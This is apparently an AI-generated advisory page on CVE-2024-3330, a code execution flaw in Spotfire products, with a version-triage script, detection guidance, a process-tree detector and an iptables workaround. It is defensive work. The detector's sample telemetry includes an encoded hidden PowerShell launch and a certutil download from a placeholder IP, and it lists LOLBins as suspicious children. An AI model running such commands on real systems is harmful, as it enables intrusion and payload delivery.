CVE-2024-3330 Overview
CVE-2024-3330 is a code execution vulnerability in Spotfire Analyst, Spotfire Server, and Spotfire for AWS Marketplace. An authenticated attacker can reach arbitrary code execution through three deployment paths: the installed Windows client (Spotfire Analyst), the Web Player (Business Author), and Automation Services. The weakness is classified as CWE-250, Execution with Unnecessary Privileges. The Windows client path requires a user other than the attacker to interact with crafted content; the Web Player and Automation Services paths require no user interaction.
Critical Impact
Successful exploitation yields arbitrary code execution: on the Windows client, as the user who opens the crafted content; on the server side, as the account running the Web Player or Automation Services process. The CVSS vector indicates a scope change, so the impact extends beyond the vulnerable component to whatever resources that account can reach.
Affected Products
- Spotfire Analyst: versions 12.0.9 through 12.5.0, and 14.0 through 14.0.2
- Spotfire Server: versions 12.0.10 through 12.5.0, 14.0 through 14.0.3, and 14.2.0 through 14.3.0
- Spotfire for AWS Marketplace: versions 14.0 before 14.3.0
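The version ranges above mix inclusive "through" bounds with an exclusive "before" bound, which is easy to get wrong when triaging an inventory by hand. The following is an added example, not a vendor tool: it encodes the ranges exactly as this page lists them and reports which (product, version) pairs fall inside. Version strings are normalised to four numeric components so that "14.0" and "14.0.0" compare equal; any hotfix suffix after the numeric part is ignored. Confirm the bound semantics against the Spotfire Security Advisory June 2024 before acting on the result.

```python
"""Affected-version check for CVE-2024-3330, built from the ranges listed on this page.

Added example, not a Spotfire vendor tool. The inclusive "through" and exclusive
"before" semantics follow the wording of the Affected Products list; verify them
against the Spotfire Security Advisory June 2024.
"""
import re

# (lower bound, upper bound, upper bound inclusive?) per product, as listed above.
AFFECTED_RANGES = {
    "Spotfire Analyst": [
        ("12.0.9", "12.5.0", True),
        ("14.0", "14.0.2", True),
    ],
    "Spotfire Server": [
        ("12.0.10", "12.5.0", True),
        ("14.0", "14.0.3", True),
        ("14.2.0", "14.3.0", True),
    ],
    "Spotfire for AWS Marketplace": [
        ("14.0", "14.3.0", False),  # "14.0 before 14.3.0"
    ],
}

VERSION_WIDTH = 4  # pad so that "14.0" == "14.0.0" == "14.0.0.0"


def parse_version(text: str) -> tuple:
    """Leading dotted numeric part only, zero-padded to VERSION_WIDTH components.

    A string like '14.0.2 HF-001' (hypothetical suffix) parses as (14, 0, 2, 0).
    """
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    if len(parts) > VERSION_WIDTH:
        raise ValueError(f"too many version components: {text!r}")
    return tuple(parts + [0] * (VERSION_WIDTH - len(parts)))


def is_affected(product: str, version: str) -> bool:
    """True if `version` of `product` falls in any range this page lists as affected."""
    v = parse_version(version)
    for low, high, inclusive in AFFECTED_RANGES[product]:
        lo, hi = parse_version(low), parse_version(high)
        if lo <= v and (v <= hi if inclusive else v < hi):
            return True
    return False


def triage(inventory):
    """Filter an iterable of (product, version) pairs down to the affected ones."""
    return [(p, v) for p, v in inventory if is_affected(p, v)]


if __name__ == "__main__":
    # Constructed inventory, not a real deployment.
    sample = [
        ("Spotfire Analyst", "14.0.2"),
        ("Spotfire Server", "14.1.0"),
        ("Spotfire for AWS Marketplace", "14.3.0"),
    ]
    for product, version in triage(sample):
        print(f"AFFECTED: {product} {version}")
```

Note that, taken literally, the page's Spotfire Server ranges leave 14.1.x unlisted and treat 14.3.0 as affected for Spotfire Server but fixed for Spotfire for AWS Marketplace; the check reproduces that, which is a reason to cross-check the advisory rather than trust the encoded ranges alone.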
Discovery Timeline
- 2024-06-27 - CVE-2024-3330 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2024-3330
Vulnerability Analysis
The vulnerability resides in three distinct execution surfaces of the Spotfire analytics platform. On the installed Windows client, an attacker can trigger arbitrary code execution provided a user other than the attacker interacts with crafted content. In the Web Player path, exploitation results in code execution as the service account running the Web Player process. The Automation Services path permits direct arbitrary code execution through the automation workflow. The scope change indicated by the CVSS vector means exploitation impacts resources beyond the originally vulnerable component.
Root Cause
The issue maps to CWE-250, Execution with Unnecessary Privileges. Spotfire components execute attacker-supplied logic with elevated privilege levels that exceed what the operation requires. This privilege mismatch transforms a content-level operation into full code execution on the host running the service.
Attack Vector
The attack requires network access and low privileges, with no user interaction for the Web Player and Automation Services paths. An authenticated user with limited Spotfire access can submit content or automation jobs that trigger code execution on the underlying server. For the Windows client path, an attacker delivers malicious analysis content that executes when a second user opens it. Refer to the Spotfire Security Advisory June 2024 for technical specifics.
Detection Methods for CVE-2024-3330
Indicators of Compromise
- Unexpected child processes spawned by Spotfire Server, Web Player, or Automation Services processes
- Outbound network connections from Spotfire service accounts to unfamiliar hosts
- New or modified analysis files (.dxp) or data files (.sbdf) uploaded shortly before anomalous process activity
- Spotfire log entries showing Automation Services jobs executed by low-privilege accounts performing system-level actions
Detection Strategies
- Monitor process creation events where the parent process is a Spotfire binary and the child is a shell, scripting engine, or LOLBin
- Alert on file writes to system or user-profile locations originating from Spotfire service accounts
- Correlate Spotfire authentication events with subsequent host-level behavioral anomalies on Spotfire servers
Monitoring Recommendations
- Forward Spotfire Server and Automation Services logs to centralized log analytics for retention and correlation
- Baseline normal Spotfire process trees and flag deviations such as cmd.exe, powershell.exe, or wscript.exe as descendants
- Review Web Player service account activity for unauthorized filesystem or registry modifications
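The process-tree and correlation strategies above can be tried out offline. The following is an added example, not code from the Spotfire vendor or from the June 2024 advisory: it scans Sysmon-style process-creation records (Event ID 1 field names) for a Spotfire worker process spawning a shell, scripting engine or LOLBin, skips children that belong to a known-good baseline, and tags each hit with the most recent Spotfire login in a 15-minute window so the analyst can see which authenticated user was active. The Spotfire image names, the baseline set, the field names and the sample telemetry are all assumptions; substitute what your own logs show.

```python
"""Process-tree detection for Spotfire Web Player / Automation Services hosts.

Added example, not code from the Spotfire vendor or the June 2024 advisory. Image
names, the baseline of expected children and the sample telemetry are assumptions.
"""
from __future__ import annotations

import json
from dataclasses import dataclass
from datetime import datetime, timedelta
from pathlib import PureWindowsPath
from typing import Optional

# Assumed Spotfire service image names; replace with the ones seen in your telemetry.
SPOTFIRE_PARENTS = {
    "spotfire.dxp.worker.host.exe",        # Web Player / Automation Services worker (assumed)
    "spotfire.dxp.worker.automation.exe",  # assumed
    "spotfire.dxp.exe",                    # installed Analyst client (assumed)
}

# Children a Spotfire process has no legitimate reason to launch.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "bitsadmin.exe", "msiexec.exe", "schtasks.exe",
}

# Children present in a healthy baseline (assumed; derive yours from real data).
BASELINE_CHILDREN = {"conhost.exe", "werfault.exe"}

LOGIN_WINDOW = timedelta(minutes=15)


@dataclass
class Alert:
    timestamp: datetime
    parent: str
    child: str
    command_line: str
    host_user: str
    spotfire_user: Optional[str]  # latest Spotfire login inside LOGIN_WINDOW, if any


def _basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def last_login_before(auth_events: list, when: datetime) -> Optional[str]:
    """User of the most recent Spotfire login in [when - LOGIN_WINDOW, when]."""
    best = None
    for ev in auth_events:
        ts = _ts(ev["timestamp"])
        if when - LOGIN_WINDOW <= ts <= when and (best is None or ts > best[0]):
            best = (ts, ev["user"])
    return best[1] if best else None


def detect(process_events: list, auth_events: list) -> list:
    """Return one Alert per Spotfire-parented suspicious child, oldest first."""
    alerts = []
    for ev in sorted(process_events, key=lambda e: _ts(e["UtcTime"])):
        parent, child = _basename(ev["ParentImage"]), _basename(ev["Image"])
        if parent not in SPOTFIRE_PARENTS or child in BASELINE_CHILDREN:
            continue
        if child in SUSPICIOUS_CHILDREN:
            when = _ts(ev["UtcTime"])
            alerts.append(Alert(when, parent, child, ev.get("CommandLine", ""),
                                ev.get("User", ""), last_login_before(auth_events, when)))
    return alerts


# Constructed sample telemetry, not real logs (backslashes are JSON-escaped).
SAMPLE_PROCESS_EVENTS = [json.loads(line) for line in r"""
{"UtcTime": "2024-07-01 10:02:11", "ParentImage": "C:\\Spotfire\\nodemanager\\Spotfire.Dxp.Worker.Host.exe", "Image": "C:\\Windows\\System32\\conhost.exe", "CommandLine": "conhost.exe 0x4", "User": "NT SERVICE\\SpotfireWP"}
{"UtcTime": "2024-07-01 10:03:40", "ParentImage": "C:\\Spotfire\\nodemanager\\Spotfire.Dxp.Worker.Host.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA", "User": "NT SERVICE\\SpotfireWP"}
{"UtcTime": "2024-07-01 10:05:02", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c dir", "User": "CORP\\admin"}
{"UtcTime": "2024-07-01 10:30:00", "ParentImage": "C:\\Spotfire\\nodemanager\\Spotfire.Dxp.Worker.Host.exe", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt", "User": "NT SERVICE\\SpotfireWP"}
""".strip().splitlines()]

# Constructed Spotfire Server login events after export to JSON (timestamp, user).
SAMPLE_AUTH_EVENTS = [
    {"timestamp": "2024-07-01 09:55:00", "user": "alice"},
    {"timestamp": "2024-07-01 10:00:30", "user": "bob"},
]


def run_sample() -> list:
    return detect(SAMPLE_PROCESS_EVENTS, SAMPLE_AUTH_EVENTS)


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a.timestamp} {a.parent} -> {a.child} as {a.host_user}; "
              f"last Spotfire login: {a.spotfire_user}; cmd: {a.command_line}")
```

On the constructed sample this raises two alerts (the encoded PowerShell launch and the certutil download) and ignores both the baseline conhost child and the cmd.exe that explorer.exe, not Spotfire, spawned. The login correlation is deliberately loose: a login inside the window is a lead for the analyst, not proof of which account submitted the content.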
How to Mitigate CVE-2024-3330
Immediate Actions Required
- Upgrade Spotfire Analyst, Spotfire Server, and Spotfire for AWS Marketplace to fixed releases identified in the vendor advisory
- Restrict Automation Services and Web Player permissions so service accounts run with least privilege
- Review and audit user accounts authorized to publish or execute Spotfire analyses and automation jobs
- Inspect recent Automation Services job history and uploaded analysis files for suspicious content
Patch Information
The vendor has released fixed versions documented in the Spotfire Security Advisory June 2024. For Spotfire for AWS Marketplace, upgrade to 14.3.0 or later. Apply corresponding patched builds for Spotfire Analyst and Spotfire Server as listed in the advisory.
Workarounds
- Limit network access to Spotfire Server and Web Player interfaces to trusted users and management networks only; note that the attack needs only an authenticated low-privilege account, so network filtering reduces exposure but does not stop a legitimate user who turns malicious or whose credentials are stolen
- Disable Automation Services where it is not actively required until patches are applied
- Enforce strict content review for analysis files originating from non-administrative authors
#!/bin/sh
# Example: restrict Spotfire Web Player access at the network layer.
# 10.10.0.0/16 is a placeholder for the management subnet; port 443 assumes the
# Web Player is reached through the Spotfire Server HTTPS listener. Rule order
# matters: the ACCEPT must precede the DROP and any broader ACCEPT already present.
iptables -A INPUT -p tcp --dport 443 -s 10.10.0.0/16 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables-save > /etc/iptables/rules.v4   # persist across reboots; path varies by distribution
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.